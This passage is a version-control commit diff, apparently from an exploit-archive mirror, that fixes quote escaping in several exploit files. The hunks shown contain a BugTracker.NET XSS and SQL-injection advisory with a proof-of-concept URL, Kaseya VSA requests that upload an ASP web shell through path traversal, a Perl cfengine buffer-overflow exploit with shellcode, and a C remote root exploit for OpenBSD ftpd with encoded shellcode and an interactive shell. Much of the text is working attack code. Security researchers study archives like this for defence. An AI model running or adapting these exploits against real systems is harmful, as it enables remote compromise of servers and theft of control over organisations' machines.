DB: 2016-10-28
This commit is contained in:
parent
da85686a94
commit
d97b4f7c48
213 changed files with 8307 additions and 8307 deletions
|
@ -34,9 +34,9 @@ scripting and SQL-injection vulnerabilities were found in the following
|
|||
files of the BugTracker.NET:
|
||||
|
||||
. *bugs.aspx*. SQL injection in line 141.
|
||||
. *delete_query.aspx*. No sanitization for \'row_id.Value\' in line 30.
|
||||
. *delete_query.aspx*. No sanitization for 'row_id.Value' in line 30.
|
||||
. *edit_bug.aspx*. Variables without sanitization in lines 1846 and 1857.
|
||||
. *edit_bug.aspx*. No sanitization for variable \'new_project\', line 2214.
|
||||
. *edit_bug.aspx*. No sanitization for variable 'new_project', line 2214.
|
||||
. *edit_bug.aspx*. XSS in line 2918.
|
||||
. *edit_comment.aspx*. XSS in line 233.
|
||||
. *edit_customfield.aspx*. Lines 165 and 172, no sanitization.
|
||||
|
@ -68,7 +68,7 @@ and Alejandro Frydman from Core Security Technologies.
|
|||
|
||||
[CVE-2010-3266 | N/A]. All XSS vulnerabilities can be exploited in
|
||||
similar ways. The following proof of concept shows how to exploit the
|
||||
XSS founded in \'edit_comment.aspx\':
|
||||
XSS founded in 'edit_comment.aspx':
|
||||
|
||||
/-----
|
||||
...
|
||||
|
@ -76,9 +76,9 @@ XSS founded in \'edit_comment.aspx\':
|
|||
231 <table border=0><tr><td>
|
||||
232
|
||||
233 <a href=edit_bug.aspx?id=<%
|
||||
Response.Write(Request[\"bug_id\"]);%>>back to <%
|
||||
Response.Write(btnet.Util.get_setting(\"SingularBugLabel\",\"bug\")); %></a>
|
||||
234 <form class=frm runat=\"server\">
|
||||
Response.Write(Request["bug_id"]);%>>back to <%
|
||||
Response.Write(btnet.Util.get_setting("SingularBugLabel","bug")); %></a>
|
||||
234 <form class=frm runat="server">
|
||||
235
|
||||
236 <table border=0>
|
||||
...
|
||||
|
@ -89,30 +89,30 @@ bug. Then, edit it using this URL:
|
|||
/-----
|
||||
http://localhost:4535/edit_comment.aspx?id=48&bug_id=3%3E%3Cscript%3Ealert%28%27%27%29;%3C/script%3E
|
||||
-----/
|
||||
As a result, the JavaScript code injected into the parameter \'bug_id\'
|
||||
As a result, the JavaScript code injected into the parameter 'bug_id'
|
||||
will be rendered without sanitization in the line 233, and executed in
|
||||
the context of the client\'s web browser.
|
||||
the context of the client's web browser.
|
||||
|
||||
|
||||
7.2. *SQL Injection Vulnerabilities*
|
||||
|
||||
[CVE-2010-3267 | N/A]. All SQL injection vulnerabilities can also be
|
||||
exploited in similar ways. Consider, for example, the code located in
|
||||
\'delete_query.aspx\':
|
||||
'delete_query.aspx':
|
||||
|
||||
/-----
|
||||
...
|
||||
26 if (IsPostBack)
|
||||
27 {
|
||||
28 // do delete here
|
||||
29 sql = @\"delete queries where qu_id = $1\";
|
||||
30 sql = sql.Replace(\"$1\", row_id.Value);
|
||||
29 sql = @"delete queries where qu_id = $1";
|
||||
30 sql = sql.Replace("$1", row_id.Value);
|
||||
31 btnet.DbUtil.execute_nonquery(sql);
|
||||
32 Server.Transfer (\"queries.aspx\");
|
||||
32 Server.Transfer ("queries.aspx");
|
||||
33 }
|
||||
...
|
||||
-----/
|
||||
In line 30, the value of \'row_id\' is injected without sanitization into
|
||||
In line 30, the value of 'row_id' is injected without sanitization into
|
||||
the SQL query. This value arrives to the server in a hidden field of a
|
||||
client request. As a result, a malicious user can manipulate this value
|
||||
in order to execute code in the database layer of the application.
|
||||
|
@ -170,7 +170,7 @@ project information and shared software tools for public use at:
|
|||
|
||||
Core Security Technologies develops strategic solutions that help
|
||||
security-conscious organizations worldwide develop and maintain a
|
||||
proactive process for securing their networks. The company\'s flagship
|
||||
proactive process for securing their networks. The company's flagship
|
||||
product, CORE IMPACT, is the most comprehensive product for performing
|
||||
enterprise security assurance testing. CORE IMPACT evaluates network,
|
||||
endpoint and end-user vulnerabilities and identifies what resources are
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
Kaseya VSA is an IT management platform for small and medium corporates.
|
||||
From its console you can control thousands of computers and mobile
|
||||
devices. So that if you own the Kaseya server, you own the organisation.
|
||||
With this post I\'m also releasing two Metasploit modules ([E1], [E2])
|
||||
With this post I'm also releasing two Metasploit modules ([E1], [E2])
|
||||
and a Ruby file ([E3]) that exploit the vulnerabilities described below.
|
||||
|
||||
A special thanks to ZDI for assisting with the disclosure of these
|
||||
|
@ -28,12 +28,12 @@ Security (http://www.agileinfosec.co.uk/)
|
|||
Disclosure: 23/09/2015 / Last updated: 28/09/2015
|
||||
|
||||
>> Background on the affected product:
|
||||
\"Kaseya VSA is an integrated IT Systems Management platform that can be
|
||||
"Kaseya VSA is an integrated IT Systems Management platform that can be
|
||||
leveraged seamlessly across IT disciplines to streamline and automate
|
||||
your IT services. Kaseya VSA integrates key management capabilities into
|
||||
a single platform. Kaseya VSA makes your IT staff more productive, your
|
||||
services more reliable, your systems more secure, and your value easier
|
||||
to show.\"
|
||||
to show."
|
||||
|
||||
A special thanks to ZDI for assisting with the vulnerability reporting
|
||||
process.
|
||||
|
@ -52,7 +52,7 @@ VSA Version 9.0.0.0 â?? 9.0.0.18
|
|||
VSA Version 9.1.0.0 â?? 9.1.0.8
|
||||
|
||||
GET /LocalAuth/setAccount.aspx
|
||||
Page will attempt to redirect, ignore this and obtain the \"sessionVal\"
|
||||
Page will attempt to redirect, ignore this and obtain the "sessionVal"
|
||||
value from the page which will be used in the following POST request.
|
||||
|
||||
POST /LocalAuth/setAccount.aspx
|
||||
|
@ -85,7 +85,7 @@ Cookie: sessionId=<sessionID>
|
|||
<... ASP shell here...>
|
||||
|
||||
The path needs to be correct, but Kaseya is helpful enough to let us
|
||||
know when a path doesn\'t exist.
|
||||
know when a path doesn't exist.
|
||||
A Metasploit module that exploits this vulnerability has been released.
|
||||
|
||||
#3
|
||||
|
@ -108,20 +108,20 @@ boundary=---------------------------114052411119142
|
|||
Content-Length: 1501
|
||||
|
||||
-----------------------------114052411119142
|
||||
Content-Disposition: form-data; name=\"directory\"
|
||||
Content-Disposition: form-data; name="directory"
|
||||
|
||||
../WebPages
|
||||
-----------------------------114052411119142
|
||||
Content-Disposition: form-data; name=\"ReferringWebWindowId\"
|
||||
Content-Disposition: form-data; name="ReferringWebWindowId"
|
||||
|
||||
31a5d16a-01b7-4f8d-adca-0b2e70006dfa
|
||||
-----------------------------114052411119142
|
||||
Content-Disposition: form-data; name=\"request\"
|
||||
Content-Disposition: form-data; name="request"
|
||||
|
||||
uploadFile
|
||||
-----------------------------114052411119142
|
||||
Content-Disposition: form-data; name=\"impinf__uploadfilelocation\";
|
||||
filename=\"shell.asp\"
|
||||
Content-Disposition: form-data; name="impinf__uploadfilelocation";
|
||||
filename="shell.asp"
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
<... ASP shell here...>
|
||||
|
|
|
@ -5,37 +5,37 @@
|
|||
|
||||
use IO::Socket;
|
||||
if(!$ARGV[1])
|
||||
{ print \"usage: ./DSR-cfengine.pl <host> <port> (default cfengine is 5308)\\n\"; exit(-1); }
|
||||
{ print "usage: ./DSR-cfengine.pl <host> <port> (default cfengine is 5308)\n"; exit(-1); }
|
||||
|
||||
$host = $ARGV[0];
|
||||
$port = $ARGV[1];
|
||||
$nop = \"\\x90\";
|
||||
$ret = pack(\"l\",0xbfafe3dc);
|
||||
$nop = "\x90";
|
||||
$ret = pack("l",0xbfafe3dc);
|
||||
$shellcode =
|
||||
\"\\x31\\xc0\\x31\\xdb\\x53\\xb3\\x06\\x53\\xb3\\x01\\x53\\xb3\\x02\\x53\\x54\\xb0\".
|
||||
\"\\x61\\xcd\\x80\\x89\\xc7\\x31\\xc0\\x50\\x50\\x50\\x66\\x68\\xb0\\xef\\xb7\\x02\".
|
||||
\"\\x66\\x53\\x89\\xe1\\x31\\xdb\\xb3\\x10\\x53\\x51\\x57\\x50\\xb0\\x68\\xcd\\x80\".
|
||||
\"\\x31\\xdb\\x39\\xc3\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\x50\\x57\".
|
||||
\"\\x50\\xb0\\x6a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x50\\x89\\xe1\\xb3\\x01\\x53\\x89\".
|
||||
\"\\xe2\\x50\\x51\\x52\\xb3\\x14\\x53\\x50\\xb0\\x2e\\xcd\\x80\\x31\\xc0\\x50\\x50\".
|
||||
\"\\x57\\x50\\xb0\\x1e\\xcd\\x80\\x89\\xc6\\x31\\xc0\\x31\\xdb\\xb0\\x02\\xcd\\x80\".
|
||||
\"\\x39\\xc3\\x75\\x44\\x31\\xc0\\x57\\x50\\xb0\\x06\\xcd\\x80\\x31\\xc0\\x50\\x56\".
|
||||
\"\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x43\\x53\\x56\\x50\\xb0\\x5a\\xcd\".
|
||||
\"\\x80\\x31\\xc0\\x43\\x53\\x56\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x50\\x68\\x2f\".
|
||||
\"\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x54\\x53\\x50\\xb0\\x3b\".
|
||||
\"\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\x56\\x50\\xb0\\x06\\xcd\\x80\".
|
||||
\"\\xeb\\x9a\";
|
||||
"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0".
|
||||
"\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02".
|
||||
"\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80".
|
||||
"\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57".
|
||||
"\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89".
|
||||
"\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50".
|
||||
"\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80".
|
||||
"\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56".
|
||||
"\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd".
|
||||
"\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f".
|
||||
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b".
|
||||
"\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80".
|
||||
"\xeb\x9a";
|
||||
|
||||
|
||||
$buf = $nop x 2222 . $shellcode . $ret x 500;
|
||||
|
||||
$socket = new IO::Socket::INET (
|
||||
Proto => \"tcp\",
|
||||
Proto => "tcp",
|
||||
PeerAddr => $host,
|
||||
PeerPort => $port,
|
||||
);
|
||||
|
||||
die \"unable to connect to $host:$port ($!)\\n\" unless $socket;
|
||||
die "unable to connect to $host:$port ($!)\n" unless $socket;
|
||||
|
||||
sleep(1); #you might have to adjust this on slow connections
|
||||
print $socket $buf;
|
||||
|
|
|
@ -40,22 +40,22 @@ int verbose = 0;
|
|||
|
||||
|
||||
/*
|
||||
Written by dvorak, garbled up by \"Smegma\" with a word xor 0xaabb mask
|
||||
Written by dvorak, garbled up by "Smegma" with a word xor 0xaabb mask
|
||||
to get rid of dots and slashes.
|
||||
*/
|
||||
|
||||
char heavenlycode[] =
|
||||
\"\\x31\\xc0\\x89\\xc1\\x80\\xc1\\x02\\x51\\x50\\x04\\x5a\\x50\\xcd\\x80\"
|
||||
\"\\xeb\\x10\\x5e\\x31\\xc9\\xb1\\x4a\\x66\\x81\\x36\\xbb\\xaa\\x46\\x46\\xe2\\xf7\\xeb\\x05\\xe8\\xeb\\xff\\xff\\xff\\xff\\xff\\xff\\x50\\xcf\\xe5\\x9b\\x7b\\xf
|
||||
a\\xbf\\xbd\\xeb\\x67\\x3b\\xfc\\x8a\\x6a\\x33\\xec\\xba\\xae\\x33\\xfa\\x76\\x2a\\x8a\\x6a\\xeb\\x22\\xfd\\xb5\\x36\\xf4\\xa5\\xf9\\xbf\\xaf\\xeb\\x67\\x3b\\x2
|
||||
3\\x7a\\xfc\\x8a\\x6a\\xbf\\x97\\xeb\\x67\\x3b\\xfb\\x8a\\x6a\\xbf\\xa4\\xf3\\xfa\\x76\\x2a\\x36\\xf4\\xb9\\xf9\\x8a\\x6a\\xbf\\xa6\\xeb\\x67\\x3b\\x27\\xe5\\xb
|
||||
4\\xe8\\x9b\\x7b\\xae\\x86\\xfa\\x76\\x2a\\x8a\\x6a\\xeb\\x22\\xfd\\x8d\\x36\\xf4\\x93\\xf9\\x36\\xf4\\x9b\\x23\\xe5\\x82\\x32\\xec\\x97\\xf9\\xbf\\x91\\xeb\\x6
|
||||
7\\x3b\\x42\\x2d\\x55\\x44\\x55\\xfa\\xeb\\x95\\x84\\x94\\x84\\x95\\x85\\x95\\x84\\x94\\x84\\x95\\x85\\x95\\x84\\x94\\x84\\x95\\x85\\x95\\x84\\x94\\x84\\x95\\x8
|
||||
5\\x95\\x84\\x94\\x84\\x95\\xeb\\x94\\xc8\\xd2\\xc4\\x94\\xd9\\xd3\";
|
||||
"\x31\xc0\x89\xc1\x80\xc1\x02\x51\x50\x04\x5a\x50\xcd\x80"
|
||||
"\xeb\x10\x5e\x31\xc9\xb1\x4a\x66\x81\x36\xbb\xaa\x46\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff\xff\xff\xff\x50\xcf\xe5\x9b\x7b\xf
|
||||
a\xbf\xbd\xeb\x67\x3b\xfc\x8a\x6a\x33\xec\xba\xae\x33\xfa\x76\x2a\x8a\x6a\xeb\x22\xfd\xb5\x36\xf4\xa5\xf9\xbf\xaf\xeb\x67\x3b\x2
|
||||
3\x7a\xfc\x8a\x6a\xbf\x97\xeb\x67\x3b\xfb\x8a\x6a\xbf\xa4\xf3\xfa\x76\x2a\x36\xf4\xb9\xf9\x8a\x6a\xbf\xa6\xeb\x67\x3b\x27\xe5\xb
|
||||
4\xe8\x9b\x7b\xae\x86\xfa\x76\x2a\x8a\x6a\xeb\x22\xfd\x8d\x36\xf4\x93\xf9\x36\xf4\x9b\x23\xe5\x82\x32\xec\x97\xf9\xbf\x91\xeb\x6
|
||||
7\x3b\x42\x2d\x55\x44\x55\xfa\xeb\x95\x84\x94\x84\x95\x85\x95\x84\x94\x84\x95\x85\x95\x84\x94\x84\x95\x85\x95\x84\x94\x84\x95\x8
|
||||
5\x95\x84\x94\x84\x95\xeb\x94\xc8\xd2\xc4\x94\xd9\xd3";
|
||||
|
||||
char user[255] = \"anonymous\";
|
||||
char pass[255] = \"anonymous@abc.com\";
|
||||
char write_dir[PATH_MAX] = \"/\";
|
||||
char user[255] = "anonymous";
|
||||
char pass[255] = "anonymous@abc.com";
|
||||
char write_dir[PATH_MAX] = "/";
|
||||
int ftpport = 21;
|
||||
unsigned long int ret_addr = 0;
|
||||
#define CMD_LOCAL 0
|
||||
|
@ -70,24 +70,24 @@ struct typeT {
|
|||
|
||||
#define NUM_TYPES 2
|
||||
struct typeT types[NUM_TYPES] = {
|
||||
\"OpenBSD 2.6\", 0xdfbfd0ac,
|
||||
\"OpenBSD 2.7\", 0xdfbfd0ac};
|
||||
"OpenBSD 2.6", 0xdfbfd0ac,
|
||||
"OpenBSD 2.7", 0xdfbfd0ac};
|
||||
|
||||
void
|
||||
usage(char *program)
|
||||
{
|
||||
int i;
|
||||
fprintf(stderr,
|
||||
\"\\nUsage: %s [-h host] [-f port] [-u user] [-p pass] [-d directory] [-t type]\\n\\t\\t[-r retaddr] [-c command]
|
||||
[-C command]\\n\\n\"
|
||||
\"Directory should be an absolute path, writable by the user.\\n\"
|
||||
\"The argument of -c will be executed on the remote host\\n\"
|
||||
\"while the argument of -C will be executed on the local\\n\"
|
||||
\"with its filedescriptors connected to the remote host\\n\"
|
||||
\"Valid types:\\n\",
|
||||
"\nUsage: %s [-h host] [-f port] [-u user] [-p pass] [-d directory] [-t type]\n\t\t[-r retaddr] [-c command]
|
||||
[-C command]\n\n"
|
||||
"Directory should be an absolute path, writable by the user.\n"
|
||||
"The argument of -c will be executed on the remote host\n"
|
||||
"while the argument of -C will be executed on the local\n"
|
||||
"with its filedescriptors connected to the remote host\n"
|
||||
"Valid types:\n",
|
||||
program);
|
||||
for (i = 0; i < NUM_TYPES; i++) {
|
||||
printf(\"%d : %s\\n\", i, types[i].name);
|
||||
printf("%d : %s\n", i, types[i].name);
|
||||
}
|
||||
exit(-1);
|
||||
}
|
||||
|
@ -98,54 +98,54 @@ main(int argc, char **argv)
|
|||
unsigned int i;
|
||||
int opt, fd;
|
||||
unsigned int type = 0;
|
||||
char *hostname = \"localhost\";
|
||||
char *hostname = "localhost";
|
||||
|
||||
if (argc < 2)
|
||||
usage(argv[0]);
|
||||
|
||||
while ((opt = getopt(argc, argv, \"h:r:u:f:d:t:vp:c:C:\")) != -1) {
|
||||
while ((opt = getopt(argc, argv, "h:r:u:f:d:t:vp:c:C:")) != -1) {
|
||||
switch (opt) {
|
||||
case \'h\':
|
||||
case 'h':
|
||||
hostname = optarg;
|
||||
break;
|
||||
case \'C\':
|
||||
case 'C':
|
||||
command = optarg;
|
||||
command_type = CMD_LOCAL;
|
||||
break;
|
||||
case \'c\':
|
||||
case 'c':
|
||||
command = optarg;
|
||||
command_type = CMD_REMOTE;
|
||||
break;
|
||||
case \'r\':
|
||||
case 'r':
|
||||
ret_addr = strtoul(optarg, NULL, 0);
|
||||
break;
|
||||
case \'v\':
|
||||
case 'v':
|
||||
verbose++;
|
||||
break;
|
||||
case \'f\':
|
||||
case 'f':
|
||||
if (!(ftpport = atoi(optarg))) {
|
||||
fprintf(stderr, \"Invalid destination port - %s\\n\", optarg);
|
||||
fprintf(stderr, "Invalid destination port - %s\n", optarg);
|
||||
exit(-1);
|
||||
}
|
||||
exit(-1);
|
||||
break;
|
||||
case \'u\':
|
||||
case 'u':
|
||||
strncpy(user, optarg, sizeof(user) - 1);
|
||||
user[sizeof(user) - 1] = 0x00;
|
||||
break;
|
||||
case \'p\':
|
||||
case 'p':
|
||||
strncpy(pass, optarg, sizeof(pass) - 1);
|
||||
pass[sizeof(pass) - 1] = 0x00;
|
||||
break;
|
||||
case \'d\':
|
||||
case 'd':
|
||||
strncpy(write_dir, optarg, sizeof(write_dir) - 1);
|
||||
write_dir[sizeof(write_dir) - 1] = 0x00;
|
||||
if ((write_dir[0] != \'/\'))
|
||||
if ((write_dir[0] != '/'))
|
||||
usage(argv[0]);
|
||||
if ((write_dir[strlen(write_dir) - 1] != \'/\'))
|
||||
strncat(write_dir, \"/\", sizeof(write_dir) - 1);
|
||||
if ((write_dir[strlen(write_dir) - 1] != '/'))
|
||||
strncat(write_dir, "/", sizeof(write_dir) - 1);
|
||||
break;
|
||||
case \'t\':
|
||||
case 't':
|
||||
type = atoi(optarg);
|
||||
if (type > NUM_TYPES)
|
||||
usage(argv[0]);
|
||||
|
@ -160,7 +160,7 @@ main(int argc, char **argv)
|
|||
if ((fd = xconnect(hostname, ftpport)) == -1)
|
||||
exit(-1);
|
||||
else
|
||||
printf(\"Connected to remote host! Sending evil codes.\\n\");
|
||||
printf("Connected to remote host! Sending evil codes.\n");
|
||||
|
||||
|
||||
ftp_login(fd, user, pass);
|
||||
|
@ -178,19 +178,19 @@ ftp_cmd_err(int fd, char *command, char *param, char *res, int size, char * msg)
|
|||
if (res == NULL)
|
||||
return 0;
|
||||
if (verbose)
|
||||
printf(\"%s\\n\", res);
|
||||
if (msg && (res[0] != \'2\')) {
|
||||
fprintf(stderr, \"%s\\n\", msg);
|
||||
printf("%s\n", res);
|
||||
if (msg && (res[0] != '2')) {
|
||||
fprintf(stderr, "%s\n", msg);
|
||||
exit(-1);
|
||||
}
|
||||
return (res[0] != \'2\');
|
||||
return (res[0] != '2');
|
||||
}
|
||||
|
||||
void shell(int fd)
|
||||
{
|
||||
fd_set readfds;
|
||||
char buf[1];
|
||||
char *tst = \"echo ; echo ; echo HAVE FUN ; id ; uname -a\\n\";
|
||||
char *tst = "echo ; echo ; echo HAVE FUN ; id ; uname -a\n";
|
||||
|
||||
write(fd, tst, strlen(tst));
|
||||
while (1) {
|
||||
|
@ -200,14 +200,14 @@ void shell(int fd)
|
|||
select(fd + 1, &readfds, NULL, NULL, NULL);
|
||||
if (FD_ISSET(0, &readfds)) {
|
||||
if (read(0, buf, 1) != 1) {
|
||||
perror(\"read\");
|
||||
perror("read");
|
||||
exit(1);
|
||||
}
|
||||
write(fd, buf, 1);
|
||||
}
|
||||
if (FD_ISSET(fd, &readfds)) {
|
||||
if (read(fd, buf, 1) != 1) {
|
||||
perror(\"read\");
|
||||
perror("read");
|
||||
exit(1);
|
||||
}
|
||||
write(1, buf, 1);
|
||||
|
@ -228,7 +228,7 @@ void do_command(int fd)
|
|||
exit (2);
|
||||
}
|
||||
write(fd, command, strlen(command));
|
||||
write(fd, \"\\n\", 1);
|
||||
write(fd, "\n", 1);
|
||||
while ((len = read(fd, buffer, sizeof(buffer))) > 0) {
|
||||
write(1, buffer, len);
|
||||
}
|
||||
|
@ -242,10 +242,10 @@ void execute_command(fd)
|
|||
int exploit_ok(int fd)
|
||||
{
|
||||
char result[1024];
|
||||
xsend(fd, \"id\\n\");
|
||||
xsend(fd, "id\n");
|
||||
|
||||
xrecieve(fd, result, sizeof(result));
|
||||
return (strstr(result, \"uid=\") != NULL);
|
||||
return (strstr(result, "uid=") != NULL);
|
||||
}
|
||||
|
||||
void exploit(int fd)
|
||||
|
@ -254,49 +254,49 @@ void exploit(int fd)
|
|||
int heavenlycode_s;
|
||||
char *dir = NULL;
|
||||
|
||||
ftp_cmd_err(fd, \"CWD\", write_dir, res, 1024, \"Can\'t CWD to write_dir\");
|
||||
ftp_cmd_err(fd, "CWD", write_dir, res, 1024, "Can't CWD to write_dir");
|
||||
|
||||
dir = strcreat(dir, \"A\", 255 - strlen(write_dir));
|
||||
ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\");
|
||||
dir = strcreat(dir, "A", 255 - strlen(write_dir));
|
||||
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
|
||||
xfree(&dir);
|
||||
|
||||
/* next on = 256 */
|
||||
|
||||
dir = strcreat(dir, \"A\", 255);
|
||||
ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\");
|
||||
dir = strcreat(dir, "A", 255);
|
||||
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
|
||||
xfree(&dir);
|
||||
/* next on = 512 */
|
||||
|
||||
heavenlycode_s = strlen(heavenlycode);
|
||||
dir = strcreat(dir, \"A\", 254 - heavenlycode_s);
|
||||
dir = strcreat(dir, "A", 254 - heavenlycode_s);
|
||||
dir = strcreat(dir, heavenlycode, 1);
|
||||
ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\");
|
||||
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
|
||||
xfree(&dir);
|
||||
/* next on = 768 */
|
||||
|
||||
dir = strcreat(dir, longToChar(ret_addr), 252 / 4);
|
||||
ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\");
|
||||
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
|
||||
xfree(&dir);
|
||||
/* length = 1020 */
|
||||
|
||||
/* 1022 moet \" zijn */
|
||||
dir = strcreat(dir, \"AAA\\\"\", 1);
|
||||
ftp_cmd_err(fd, \"MKD\", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, \"CWD\", dir, res, 1024, \"Can\'t change to directory\");
|
||||
/* 1022 moet " zijn */
|
||||
dir = strcreat(dir, "AAA\"", 1);
|
||||
ftp_cmd_err(fd, "MKD", dir, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, "CWD", dir, res, 1024, "Can't change to directory");
|
||||
xfree(&dir);
|
||||
|
||||
/* and tell it to blow up */
|
||||
ftp_cmd_err(fd, \"PWD\", NULL, res, 1024, NULL);
|
||||
ftp_cmd_err(fd, "PWD", NULL, res, 1024, NULL);
|
||||
|
||||
if (!exploit_ok(fd)) {
|
||||
if (command != NULL) {
|
||||
exit (2);
|
||||
}
|
||||
fprintf(stderr, \"Exploit failed\\n\");
|
||||
fprintf(stderr, "Exploit failed\n");
|
||||
exit (1);
|
||||
}
|
||||
if (command == NULL)
|
||||
|
@ -346,7 +346,7 @@ xrealloc(void *ptr, size_t size)
|
|||
char *wittgenstein_was_a_drunken_swine;
|
||||
|
||||
if (!(wittgenstein_was_a_drunken_swine = (char *) realloc(ptr, size))) {
|
||||
fprintf(stderr, \"Cannot calculate universe\\n\");
|
||||
fprintf(stderr, "Cannot calculate universe\n");
|
||||
exit(-1);
|
||||
}
|
||||
return (wittgenstein_was_a_drunken_swine);
|
||||
|
@ -367,7 +367,7 @@ xmalloc(size_t size)
|
|||
char *heidegger_was_a_boozy_beggar;
|
||||
|
||||
if (!(heidegger_was_a_boozy_beggar = (char *) malloc(size))) {
|
||||
fprintf(stderr, \"Out of cheese error\\n\");
|
||||
fprintf(stderr, "Out of cheese error\n");
|
||||
exit(-1);
|
||||
}
|
||||
return (heidegger_was_a_boozy_beggar);
|
||||
|
@ -382,7 +382,7 @@ xconnect(char *host, u_short port)
|
|||
int fd;
|
||||
|
||||
if ((he = gethostbyname(host)) == NULL) {
|
||||
perror(\"gethostbyname\");
|
||||
perror("gethostbyname");
|
||||
return (-1);
|
||||
}
|
||||
memset(&s_in, 0, sizeof(s_in));
|
||||
|
@ -391,11 +391,11 @@ xconnect(char *host, u_short port)
|
|||
memcpy(&s_in.sin_addr.s_addr, he->h_addr, he->h_length);
|
||||
|
||||
if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
|
||||
perror(\"socket\");
|
||||
perror("socket");
|
||||
return (-1);
|
||||
}
|
||||
if (connect(fd, (const struct sockaddr *) & s_in, sizeof(s_in)) == -1) {
|
||||
perror(\"connect\");
|
||||
perror("connect");
|
||||
return (-1);
|
||||
}
|
||||
return fd;
|
||||
|
@ -409,20 +409,20 @@ ftp_login(int fd, char *user, char *password)
|
|||
int rep;
|
||||
xrecieveall(fd, reply, sizeof(reply));
|
||||
if (verbose) {
|
||||
printf(\"Logging in ..\\n\");
|
||||
printf(\"%s\\n\", reply);
|
||||
printf("Logging in ..\n");
|
||||
printf("%s\n", reply);
|
||||
}
|
||||
xsendftpcmd(fd, \"USER\", user);
|
||||
xsendftpcmd(fd, "USER", user);
|
||||
xrecieveall(fd, reply, sizeof(reply));
|
||||
if (verbose)
|
||||
printf(\"%s\\n\", reply);
|
||||
xsendftpcmd(fd, \"PASS\", password);
|
||||
printf("%s\n", reply);
|
||||
xsendftpcmd(fd, "PASS", password);
|
||||
xrecieveall(fd, reply, sizeof(reply));
|
||||
if (verbose)
|
||||
printf(\"%s\\n\", reply);
|
||||
printf("%s\n", reply);
|
||||
|
||||
if (reply[0] != \'2\') {
|
||||
printf(\"Login failed.\\n\");
|
||||
if (reply[0] != '2') {
|
||||
printf("Login failed.\n");
|
||||
exit(-1);
|
||||
}
|
||||
}
|
||||
|
@ -433,10 +433,10 @@ xsendftpcmd(int fd, char *command, char *param)
|
|||
xsend(fd, command);
|
||||
|
||||
if (param != NULL) {
|
||||
xsend(fd, \" \");
|
||||
xsend(fd, " ");
|
||||
xsend(fd, param);
|
||||
}
|
||||
xsend(fd, \"\\r\\n\");
|
||||
xsend(fd, "\r\n");
|
||||
}
|
||||
|
||||
|
||||
|
@ -445,7 +445,7 @@ xsend(int fd, char *buf)
|
|||
{
|
||||
|
||||
if (send(fd, buf, strlen(buf), 0) != strlen(buf)) {
|
||||
perror(\"send\");
|
||||
perror("send");
|
||||
exit(-1);
|
||||
}
|
||||
}
|
||||
|
@ -462,7 +462,7 @@ xrecieveall(int fd, char *buf, int size)
|
|||
memset(buf, 0, size);
|
||||
do {
|
||||
xrecieve(fd, buf, size);
|
||||
} while (buf[3] == \'-\');
|
||||
} while (buf[3] == '-');
|
||||
}
|
||||
/* recieves a line from the ftpd */
|
||||
void
|
||||
|
@ -475,25 +475,25 @@ xrecieve(int fd, char *buf, int size)
|
|||
|
||||
while (buf < end) {
|
||||
if (read(fd, buf, 1) != 1) {
|
||||
perror(\"read\"); /* XXX */
|
||||
perror("read"); /* XXX */
|
||||
exit(-1);
|
||||
}
|
||||
if (buf[0] == \'\\n\') {
|
||||
buf[0] = \'\\0\';
|
||||
if (buf[0] == '\n') {
|
||||
buf[0] = '\0';
|
||||
return;
|
||||
}
|
||||
if (buf[0] != \'\\r\') {
|
||||
if (buf[0] != '\r') {
|
||||
buf++;
|
||||
}
|
||||
}
|
||||
buf--;
|
||||
